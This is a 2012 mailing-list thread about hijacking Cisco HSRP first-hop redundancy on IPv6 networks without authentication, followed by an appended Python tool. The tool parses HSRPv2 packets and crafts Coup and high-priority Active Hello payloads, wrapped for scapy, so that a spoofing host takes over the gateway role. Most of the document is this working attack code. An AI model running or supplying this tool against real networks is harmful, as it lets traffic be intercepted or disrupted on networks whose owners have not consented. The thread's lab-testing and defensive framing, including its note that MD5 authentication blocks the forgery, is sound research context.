[ipv6hackers] Cisco HSRP hijacking
Jim Small
jim.small at cdw.com
Sun Dec 2 19:23:06 CET 2012
> > I'm assuming you mean if md5 authentication isn't used? If not, then yes
> > you would be susceptible to spoofing attacks.
> >
> >
> Yes. MD5 authentication is not enabled.
>
> >
> > > For IPv6 networks, HSRPv2 would be in place. Would this HSRP hijacking
> > > technique work and be applicable in an IPv6 environment? Does anyone have a
> > > successful test case for this?
> >
> > You should be able to use scapy to do the same attack for any FHRP (HSRP,
> > VRRP, GLBP) whether it's v4 or v6 if the FHRP isn't using "secure"
> > authentication. See:
> > http://packetlife.net/blog/2008/oct/27/hijacking-hsrp/
> > http://www.gotohack.org/2011/01/scapy-hsrp-md5-auth-dissecter-to.html
> >
> >
> I actually refer to these same sites as references ; ) I understand the
> background mechanism of how the hijacking process could work, and the
> HSRPv2 packet dissector class does not exist in Scapy v2.2.0-dev. I tried to
> make a proof of concept with Raw() packet replay with a higher Priority
> value, yet no luck.
>
> I am curious if you or anyone around has created such a successful test case
> before? I know theoretically it should happen. Thanks!
I haven't personally tried it. However, from looking at HSRPv2 packet captures the format looks pretty straightforward. You could always set up GNS3 with two 7200s and then connect your system to a virtual interface to inject scapy packets. GNS3 even lets you do packet captures so you can do a hex comparison to validate you have the packet formatting correct. I wouldn't think it would be that hard, but I haven't done it personally. So many cool ideas, so little time... :-)
--Jim
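Since Scapy 2.2.0-dev has no HSRPv2 layer, the thread's suggestion amounts to hand-packing the HSRPv2 TLVs and shipping them as Raw() over UDP. The following is an added example, not code from the thread or from Scapy: a pure-stdlib HSRPv2 Group State TLV builder/parser, a constructed IPv6 Hello payload (not a real capture) that the parser decodes and the builder reproduces byte for byte (the kind of hex comparison Jim describes), and a craft_hijack() helper that turns an observed Hello into the Coup + Active Hello pair with a higher priority that the packetlife write-up relies on. The TLV layout (type 1 / length 40 Group State, type 3 / length 8 text auth, millisecond timers, 16-byte virtual IP field) follows what Wireshark's HSRP dissector shows; the placement of an IPv4 virtual address in the first 4 bytes of that field, the sample MAC/IP values, and the scapy_packet() wrapper's use of ff02::66/UDP 2029 for IPv6 and 224.0.0.102/UDP 1985 for IPv4 are assumptions to verify against your own GNS3 capture.

```python
"""HSRPv2 Group State TLV builder/parser and hijack-payload crafter (stdlib only).

Added example for the ipv6hackers thread; the field layout is taken from
Wireshark's HSRPv2 dissection and should be checked against a real capture.
"""
import ipaddress
import struct
from dataclasses import dataclass, replace

TLV_GROUP_STATE, TLV_TEXT_AUTH, TLV_MD5_AUTH = 1, 3, 4
OP_HELLO, OP_COUP, OP_RESIGN = 0, 1, 2
STATE_SPEAK, STATE_STANDBY, STATE_ACTIVE = 4, 8, 16

# version, opcode, state, ip-version, group, identifier(MAC), priority,
# hello(ms), hold(ms), virtual IP (16 bytes) -> 40 bytes, matching length 40.
GROUP_STATE_FMT = "!BBBBH6sIII16s"
GROUP_STATE_LEN = struct.calcsize(GROUP_STATE_FMT)


@dataclass
class GroupState:
    opcode: int
    state: int
    ip_version: int
    group: int
    identifier: bytes   # sender's MAC, 6 bytes
    priority: int
    hello_ms: int
    hold_ms: int
    virtual_ip: str


def pack_vip(addr: str) -> bytes:
    # Assumption: an IPv4 virtual IP occupies the first 4 bytes, zero padded.
    return ipaddress.ip_address(addr).packed.ljust(16, b"\x00")


def unpack_vip(raw16: bytes, ip_version: int) -> str:
    if ip_version == 4:
        return str(ipaddress.IPv4Address(raw16[:4]))
    return str(ipaddress.IPv6Address(raw16))


def build_group_state_tlv(gs: GroupState) -> bytes:
    body = struct.pack(GROUP_STATE_FMT, 2, gs.opcode, gs.state, gs.ip_version,
                       gs.group, gs.identifier, gs.priority, gs.hello_ms,
                       gs.hold_ms, pack_vip(gs.virtual_ip))
    return struct.pack("!BB", TLV_GROUP_STATE, len(body)) + body


def build_text_auth_tlv(password: bytes = b"cisco") -> bytes:
    # Plain-text auth is the default and gives no protection; MD5 (type 4) would.
    return struct.pack("!BB", TLV_TEXT_AUTH, 8) + password[:8].ljust(8, b"\x00")


def parse_tlvs(payload: bytes):
    """Walk the HSRPv2 payload and return [(type, value), ...]."""
    tlvs, off = [], 0
    while off + 2 <= len(payload):
        t, length = struct.unpack_from("!BB", payload, off)
        value = payload[off + 2:off + 2 + length]
        if len(value) != length:
            raise ValueError("truncated TLV at offset %d" % off)
        tlvs.append((t, value))
        off += 2 + length
    return tlvs


def parse_group_state(value: bytes) -> GroupState:
    if len(value) != GROUP_STATE_LEN:
        raise ValueError("Group State TLV must be %d bytes" % GROUP_STATE_LEN)
    ver, op, st, ipv, grp, ident, prio, hello, hold, vip = struct.unpack(GROUP_STATE_FMT, value)
    if ver != 2:
        raise ValueError("not HSRPv2 (version %d)" % ver)
    return GroupState(op, st, ipv, grp, ident, prio, hello, hold, unpack_vip(vip, ipv))


def craft_hijack(observed: GroupState, attacker_mac: bytes, priority: int = 255):
    """Return (coup_payload, hello_payload) for the observed group.

    Per the HSRP state machine (RFC 2281 section 5), a Coup, or a Hello from a
    router claiming Active with a higher priority, moves the real Active router
    to Speak; keep re-sending the Hello every hello_ms to hold the role.
    """
    if priority <= observed.priority:
        raise ValueError("hijack priority must exceed the observed %d" % observed.priority)
    coup = replace(observed, opcode=OP_COUP, state=STATE_ACTIVE,
                   identifier=attacker_mac, priority=priority)
    hello = replace(coup, opcode=OP_HELLO)
    auth = build_text_auth_tlv()
    return build_group_state_tlv(coup) + auth, build_group_state_tlv(hello) + auth


def scapy_packet(payload: bytes, ip_version: int, src_mac: str):
    """Wrap the raw payload as Raw() over UDP, as the thread suggests (needs scapy)."""
    from scapy.all import Ether, IP, IPv6, UDP, Raw  # imported lazily on purpose
    if ip_version == 6:
        l3, port = IPv6(dst="ff02::66"), 2029          # assumed HSRP-for-IPv6 group/port
    else:
        l3, port = IP(dst="224.0.0.102", ttl=1), 1985  # HSRPv2 IPv4 group/port
    return Ether(src=src_mac) / l3 / UDP(sport=port, dport=port) / Raw(load=payload)


# Constructed (not captured) HSRPv2 IPv6 Hello: group 10, Active, priority 100,
# hello 3000 ms, hold 10000 ms, virtual IP fe80::205:73ff:fea0:a, text auth "cisco".
SAMPLE_HELLO = bytes.fromhex(
    "0128" "02" "00" "10" "06" "000a" "001122334455" "00000064" "00000bb8" "00002710"
    "fe80000000000000020573fffea0000a"
    "0308" "636973636f000000")

if __name__ == "__main__":
    gs = parse_group_state(parse_tlvs(SAMPLE_HELLO)[0][1])
    print(gs)
    coup, hello = craft_hijack(gs, bytes.fromhex("0a0b0c0d0e0f"))
    print("coup :", coup.hex())
    print("hello:", hello.hex())
```

Run it once against a Hello you captured in GNS3 instead of SAMPLE_HELLO; if build_group_state_tlv() plus the auth TLV does not reproduce the captured bytes exactly, the layout assumption is wrong for that IOS and the hijack payload will be ignored. Enabling MD5 authentication (the type 4 TLV) on the real routers is what makes this forgery fail.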